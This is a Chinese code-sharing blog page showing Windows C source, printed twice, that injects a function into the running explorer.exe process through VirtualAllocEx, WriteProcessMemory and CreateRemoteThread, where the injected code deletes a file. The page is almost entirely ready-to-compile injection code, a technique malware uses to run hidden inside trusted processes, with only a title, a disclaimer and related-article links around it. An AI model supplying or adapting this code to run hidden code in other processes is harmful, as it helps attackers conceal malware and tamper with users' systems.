把自己的代码注入explorer.exe。详细参见源代码
2013-10-23 09:17
579 查看
#define UNICODE
#define _UNICODE
#include
#include
#include
typedef struct _remoteparameter
{
DWORD rpfindfirstfile;
DWORD rpdeletefile;
DWORD rpfindclose;
HANDLE rpfilehandle;
WIN32_FIND_DATA rpfdata;
TCHAR rptname[MAX_PATH];
}REMOTEPARAMETER, *PREMOTEPARAMETER;
DWORD GetProcessId(LPCTSTR str)
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = {0};
// Take a snapshot of all processes in the system.
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
return -1;
// Fill in the size of the structure before using it.
pe32.dwSize = sizeof(PROCESSENTRY32);
// Walk the snapshot of the processes, and for each process,
if (Process32First(hProcessSnap, &pe32))
{
do
{
if(_tcsicmp(str,pe32.szExeFile)==0)
{
CloseHandle (hProcessSnap);
return pe32.th32ProcessID;
}
}
while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle (hProcessSnap);
return -1;
}
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *EDeleteFile)(LPCTSTR);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
EFindFirstFile tFindFirstFile;
EDeleteFile tDeleteFile;
EFindClose tFindClose;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tDeleteFile=(EDeleteFile)erp->rpdeletefile;
tFindClose=(EFindClose)erp->rpfindclose;
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle!=INVALID_HANDLE_VALUE)
{
if(!tDeleteFile(erp->rptname))
{
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
return -1;
}
return 0;
}
int main()
{
// TODO: Place code here.
TCHAR name[20];
_tcscpy(name,_T("c:\\shenyue.txt"));
HANDLE ethread;
DWORD remotepid;
int cb;
REMOTEPARAMETER rp;
HINSTANCE hkernel32;
LPVOID remotethr;
LPVOID remotepar;
remotepid=GetProcessId(_T("explorer.exe"));
if(remotepid==-1)
return -1;
HANDLE rphandle=OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,remotepid);
cb=sizeof(TCHAR)*4*1024;
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
CloseHandle(rphandle);
return -2;
}
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
CloseHandle(rphandle);
return -2;
}
{
memset(&rp,0,sizeof(rp));
_tcscpy(rp.rptname,name);
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpdeletefile=(DWORD)GetProcAddress(hkernel32,"DeleteFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
}
cb=sizeof(TCHAR)*sizeof(rp);
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
CloseHandle(rphandle);
return -2;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
CloseHandle(rphandle);
return -2;
}
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
CloseHandle(rphandle);
return -3;
}
return 0;
}
#define _UNICODE
#include
#include
#include
typedef struct _remoteparameter
{
DWORD rpfindfirstfile;
DWORD rpdeletefile;
DWORD rpfindclose;
HANDLE rpfilehandle;
WIN32_FIND_DATA rpfdata;
TCHAR rptname[MAX_PATH];
}REMOTEPARAMETER, *PREMOTEPARAMETER;
DWORD GetProcessId(LPCTSTR str)
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = {0};
// Take a snapshot of all processes in the system.
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
return -1;
// Fill in the size of the structure before using it.
pe32.dwSize = sizeof(PROCESSENTRY32);
// Walk the snapshot of the processes, and for each process,
if (Process32First(hProcessSnap, &pe32))
{
do
{
if(_tcsicmp(str,pe32.szExeFile)==0)
{
CloseHandle (hProcessSnap);
return pe32.th32ProcessID;
}
}
while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle (hProcessSnap);
return -1;
}
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *EDeleteFile)(LPCTSTR);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
EFindFirstFile tFindFirstFile;
EDeleteFile tDeleteFile;
EFindClose tFindClose;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tDeleteFile=(EDeleteFile)erp->rpdeletefile;
tFindClose=(EFindClose)erp->rpfindclose;
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle!=INVALID_HANDLE_VALUE)
{
if(!tDeleteFile(erp->rptname))
{
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
return -1;
}
return 0;
}
int main()
{
// TODO: Place code here.
TCHAR name[20];
_tcscpy(name,_T("c:\\shenyue.txt"));
HANDLE ethread;
DWORD remotepid;
int cb;
REMOTEPARAMETER rp;
HINSTANCE hkernel32;
LPVOID remotethr;
LPVOID remotepar;
remotepid=GetProcessId(_T("explorer.exe"));
if(remotepid==-1)
return -1;
HANDLE rphandle=OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,remotepid);
cb=sizeof(TCHAR)*4*1024;
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
CloseHandle(rphandle);
return -2;
}
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
CloseHandle(rphandle);
return -2;
}
{
memset(&rp,0,sizeof(rp));
_tcscpy(rp.rptname,name);
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpdeletefile=(DWORD)GetProcAddress(hkernel32,"DeleteFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
}
cb=sizeof(TCHAR)*sizeof(rp);
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
CloseHandle(rphandle);
return -2;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
CloseHandle(rphandle);
return -2;
}
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
CloseHandle(rphandle);
return -3;
}
return 0;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 远程进程注入 - 把自己的代码注入explorer.exe
- 这么详细的分类 PHP源代码网站你见过没有? PHP中的每一个方法,每一个操作,每一个头文件,每一个函数,每一个类.每一个属性,每一个事件都有相应的范例代码
- Cisco IOS HTTP Server代码注入漏洞详细分析与渗透测试
- 基于visual c++之windows核心编程代码分析(64)现有的exe文件中添加自己的代码
- 【HACK】破解APK并注入自己的代码
- 今后尽量多看点开源代码,并将自己的理解详细的分享出来
- 这么详细的分类 C++ 源代码网站你见过没有? C++ 中的每一个方法,每一个操作,每一个头文件,每一个函数,每一个类.每一个属性,每一个事件都有相应的范例代码
- 向一个运行中的进程注入自己的代码
- [置顶] Android开发之SDCardUtils工具类。java工具详细代码,附源代码。判断SD卡是否挂载等功能
- 这么详细的分类 JSP源代码网站你见过没有? JSP中的每一个方法,每一个操作,每一个函数,每一个类.每一个属性,每一个事件都有相应的范例代码
- smarty模板配置代码详细说明及如何注册自己的smarty函数
- 史上最简单教程:向第三方jar包注入自己的代码
- 这么详细的分类 Java源代码网站你见过没有? Java中的每一个方法,每一个操作,每一个函数,每一个类.每一个属性,每一个事件都有相应的范例代码
- Hook任务栏时钟窗口(原理其实很简单,就是注入DLL到时钟窗口进程(explorer.exe))
- ASP.Net 2.0 窗体身份验证机制-转+自己代码注释示例与更详细的说明(网上转)
- 用自己或任意的窗口管理器替换掉Explorer.exe
- 向自己的模块添加错误代码_使用vc自带的工具MC创建资源并将其添加至DLL或EXE中
- 1f12可以查看最终的静态html页面,和JavaScript源代码 ,那自己写js源码不就泄露了吗 2由JavaScript代码暴露,重新认识”前端“和”后端“
- ios在系统代码中注入自己的代码
- 详细讲解Android对自己的应用代码进行混淆加密防止反编译